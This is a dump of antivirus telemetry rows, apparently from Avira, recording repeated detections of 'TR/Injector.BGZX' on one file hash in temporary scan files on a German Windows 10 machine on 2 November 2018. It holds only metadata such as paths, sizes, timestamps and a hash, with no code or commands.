  Row(detection=Row(filename='avscan-20181102-055336-9c57fddb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055336-9C57FDDB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061826-14806bd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061826-14806BD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055042-346e7d3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055042-346E7D3F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062534-139cbddf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062534-139CBDDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061716-ea67b6d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061716-EA67B6D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055355-a7371901', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055355-A7371901', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051633-6f0bdd64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051633-6F0BDD64', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055042-3497a9fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055042-3497A9FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055054-3bcbc604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055054-3BCBC604', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061703-e2e8aad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061703-E2E8AAD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055305-898d0302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055305-898D0302', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061706-e4c6251b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061706-E4C6251B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055336-9c2d7c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055336-9C2D7C9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060849-bc2b122b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060849-BC2B122B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055007-1fc4c44f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055007-1FC4C44F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051633-6f13f457', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051633-6F13F457', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053627-36bd90b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053627-36BD90B5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051657-7d568d4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051657-7D568D4C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061856-261d711e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061856-261D711E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055340-9e9c2fe6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055340-9E9C2FE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062524-0d326109', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062524-0D326109', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062523-0cbbf7d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062523-0CBBF7D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061716-ea3bae24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061716-EA3BAE24', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062546-1a4fb7b6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062546-1A4FB7B6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055309-8c393e3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055309-8C393E3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060854-bf6be84f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060854-BF6BE84F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053628-379547c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053628-379547C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055003-1d246bee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055003-1D246BEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055017-25929358', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055017-25929358', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062540-16a2656c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062540-16A2656C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053628-37596f3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053628-37596F3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061858-2762ec2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061858-2762EC2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060841-b7b2681b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060841-B7B2681B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062504-01b89da6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062504-01B89DA6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051606-5f006a38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051606-5F006A38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055027-2ba420f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055027-2BA420F8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060801-9fd59f6e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060801-9FD59F6E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061711-e7873954', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061711-E7873954', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062541-17cf6a2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062541-17CF6A2B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051614-63de00a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051614-63DE00A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053639-3dc7d203', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053639-3DC7D203', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062541-176b52fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062541-176B52FB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060842-b7ee3cea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060842-B7EE3CEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054044-cfc5c556', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054044-CFC5C556', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055037-3198807a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055037-3198807A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053639-3dbc9662', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053639-3DBC9662', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061708-e5788787', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061708-E5788787', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061707-e507505e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061707-E507505E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054035-caca5a74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054035-CACA5A74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055048-37e62a60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055048-37E62A60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051659-7e5cefad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051659-7E5CEFAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055048-38262c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055048-38262C61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055041-338600bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055041-338600BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053648-432a3fb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053648-432A3FB9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051616-64be79f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051616-64BE79F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:14Z'), dt=datetime.date(2018, 11, 2)),
